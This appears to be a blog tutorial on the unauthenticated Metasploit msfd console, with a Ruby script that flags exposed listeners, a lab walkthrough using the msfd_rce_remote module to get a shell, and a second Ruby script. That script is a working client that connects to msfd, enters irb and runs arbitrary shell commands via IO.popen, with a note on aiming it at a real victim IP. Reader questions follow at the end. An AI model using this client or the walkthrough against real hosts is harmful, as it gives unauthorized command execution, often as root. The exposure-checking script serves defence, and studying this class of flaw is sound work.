Introduction
msfd makes it possible to get a msfconsole-like interface over a TCP socket, with everything typed into it handled by the framework's Ruby interpreter. There is no authentication on that socket, so if it is reachable on a network interface, anyone who can connect gets a console and, through it, a shell on the victim's machine running as the user who started msfd. This is how msfd is designed to work rather than a bug in one release, so at the time of writing every version of Metasploit that ships msfd is affected.
About msfd
msfd is a tool that opens a network interface to a msfconsole. It is started with the IP address (-a) and port (-p) on which it should listen for incoming connections; by default it binds to loopback only, on port 55554, so the exposure comes from starting it with -a pointing at a LAN or public-facing address. This lets one or more users connect to the framework from a remote system, and every one of them gets the same unauthenticated console.
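As an added example (my code, not part of the original post and not Metasploit's own), the following Ruby script reads `ss -ltnp`-style output and reports msfd listeners that other hosts can reach. It assumes msfd's default port 55554 and the -a/-p bind options from msfd's help; the sample ss output is constructed.

```ruby
# Added example, not part of the original post. Flags msfd listeners that are
# reachable from other hosts, given `ss -ltnp`-style output.
#
# msfd binds to loopback unless told otherwise:
#   msfd                     # 127.0.0.1:55554, only local users can connect
#   msfd -a 192.168.1.10     # listens on the LAN interface: anyone who can
#                            # reach the port gets an unauthenticated console
#   msfd -p 4444             # different port; does not change the exposure
require 'ipaddr'

MSFD_DEFAULT_PORT = 55554

# True for 127.0.0.0/8 and ::1. `ss` prints IPv6 addresses in brackets and
# the wildcard as "*" or "[::]".
def loopback?(addr)
  a = addr.delete_prefix('[').delete_suffix(']')
  a = '::' if a == '*'
  IPAddr.new(a).loopback?
rescue IPAddr::InvalidAddressError
  false
end

# Split "addr:port" on the last colon so IPv6 works: "[::1]:55554" -> ["[::1]", 55554]
def split_local(field)
  i = field.rindex(':')
  [field[0...i], field[(i + 1)..-1].to_i]
end

# Returns the non-loopback local addresses on which +port+ is listening.
# The process column is ignored: msfd runs under the ruby interpreter, so
# the name there is not a reliable identifier.
def exposed_msfd_listeners(ss_output, port = MSFD_DEFAULT_PORT)
  ss_output.each_line.filter_map do |line|
    cols = line.split
    next unless cols[0] == 'LISTEN' && cols[3]
    addr, p = split_local(cols[3])
    addr if p == port && !loopback?(addr)
  end
end

# Constructed sample: one loopback msfd, one exposed on the LAN, one on ::1,
# plus sshd as noise.
SAMPLE_SS = <<~SS
  State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
  LISTEN 0      128    127.0.0.1:55554      0.0.0.0:*         users:(("ruby",pid=1234,fd=9))
  LISTEN 0      128    0.0.0.0:22           0.0.0.0:*         users:(("sshd",pid=800,fd=3))
  LISTEN 0      128    192.168.1.10:55554   0.0.0.0:*         users:(("ruby",pid=2345,fd=9))
  LISTEN 0      128    [::1]:55554          [::]:*            users:(("ruby",pid=3456,fd=9))
SS

if __FILE__ == $PROGRAM_NAME
  exposed = exposed_msfd_listeners(SAMPLE_SS)
  puts exposed.empty? ? 'msfd is loopback-only' : "msfd exposed on: #{exposed.join(', ')}"
end
```

On a live host, feed it `ss -ltnp` output instead of SAMPLE_SS; anything it prints is a socket that the exploit below would work against.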
Lab Environment
Framework: Metasploit Framework (MSF)
Victim's operating system: Kali Linux, kernel 4.6.0-kali-amd64 (2016.2)
Attacker's operating system: Kali Linux, kernel 4.15.0-kali-amd64 (2018.2)
Step 1: The msfd service is running on the victim's machine, bound to an address the attacker can reach.
Step 2: The attacker opens msfconsole.
Step 3: The attacker runs "search msfd", gets two results, and selects the remote one with "use exploit/multi/misc/msfd_rce_remote".
Step 4: The attacker reviews the module's settings with "options". The only value that has to be supplied is RHOST (the victim's IP); RPORT already defaults to 55554, so they run "set RHOST <victim IP>".
Step 5: The attacker types "exploit". The module connects to the msfd socket, has the console run the payload, and opens a command shell session on the victim's machine.
Step 6: With that raw shell the attacker can run any command on the victim's machine as the user who started msfd, which on a default Kali install is root.
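To make the exchange behind steps 3 to 6 concrete, here is an added Ruby example (my code, not the msfd_rce_remote module's) that talks to an msfd socket the way a client would: read the console prompt, enter "irb" (msfconsole's Ruby shell), send a Ruby expression that runs a shell command, and parse the echoed result. It assumes msfd's irb echoes values as "=> ..." and that prompts look like "msf > " and ">> "; the fake daemon, its banner and its command output are constructed so the exchange runs offline.

```ruby
# Added example, not the msfd_rce_remote module's code. Shows the exchange that
# turns an exposed msfd socket into command execution:
#   daemon -> client : banner and "msf > " prompt
#   client -> daemon : "irb\n"                  (msfconsole's Ruby shell)
#   daemon -> client : ">> "                    (irb prompt, assumed)
#   client -> daemon : IO.popen("id", &:read)\n
#   daemon -> client : => "uid=0(root) ...\n"   (irb echo, assumed)
require 'socket'

MSFD_DEFAULT_PORT = 55554

# Ruby source that runs +cmd+ on the daemon's host and evaluates to its output.
# String#inspect yields a quoted literal, so quotes or "#{...}" in cmd cannot
# break out of the string on the remote side.
def ruby_expr(cmd)
  "IO.popen(#{cmd.inspect}, &:read)\n"
end

# Pull the String value out of irb's '=> "..."' echo; returns the raw reply
# when no echo is found (e.g. the expression raised on the daemon).
def parse_irb_result(reply)
  clean = reply.gsub(/\e\[[\d;]*m/, '')          # drop ANSI colour codes
  m = clean.match(/^=> (".*")$/)
  return clean unless m
  m[1].undump
rescue RuntimeError
  m[1]
end

# Read until the peer has been quiet for +idle+ seconds or closes the stream.
def drain(io, idle)
  buf = +''
  while IO.select([io], nil, nil, idle)
    chunk = io.read_nonblock(4096, exception: false)
    break if chunk.nil? || chunk == :wait_readable
    buf << chunk
  end
  buf
end

class MsfdClient
  def initialize(reader, writer, idle: 0.3)
    @r, @w, @idle = reader, writer, idle
  end

  # Real target: one TCPSocket serves as both reader and writer.
  def self.connect(host, port = MSFD_DEFAULT_PORT, **opts)
    s = TCPSocket.new(host, port)
    new(s, s, **opts)
  end

  # Run one shell command through the console's irb and return its output.
  def run_command(cmd)
    drain(@r, @idle)               # banner + "msf > "
    @w.write("irb\n")
    drain(@r, @idle)               # ">> "
    @w.write(ruby_expr(cmd))
    parse_irb_result(drain(@r, @idle))
  end
end

# Constructed stand-in for the daemon so the exchange can run offline. It only
# answers the two messages this client sends; the command output is canned.
FAKE_ID_OUTPUT = "uid=0(root) gid=0(root) groups=0(root)\n"

def fake_msfd(reader, writer)
  Thread.new do
    writer.write("\n       =[ metasploit ]=\n\nmsf > ")   # constructed banner
    writer.write('>> ') if reader.gets == "irb\n"
    reader.gets                                            # the IO.popen(...) line
    writer.write("=> #{FAKE_ID_OUTPUT.inspect}\n>> ")
    writer.close
  end
end

# Wire client and fake daemon together with two pipes and run "id".
def demo_exchange
  c2d_r, c2d_w = IO.pipe   # client -> daemon
  d2c_r, d2c_w = IO.pipe   # daemon -> client
  t = fake_msfd(c2d_r, d2c_w)
  out = MsfdClient.new(d2c_r, c2d_w).run_command('id')
  c2d_w.close
  t.join
  out
end

puts demo_exchange if __FILE__ == $PROGRAM_NAME
```

Against a real target, MsfdClient.connect(victim_ip).run_command('id') replaces demo_exchange. The point to take from the exchange is that no step authenticates: the socket hands out a console, the console hands out irb, and irb hands out the host.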
2 Comments
Will it work over WAN?
What is the vulnerability here?
What is the entry point from the attacker's view?
What are the exploitation vectors?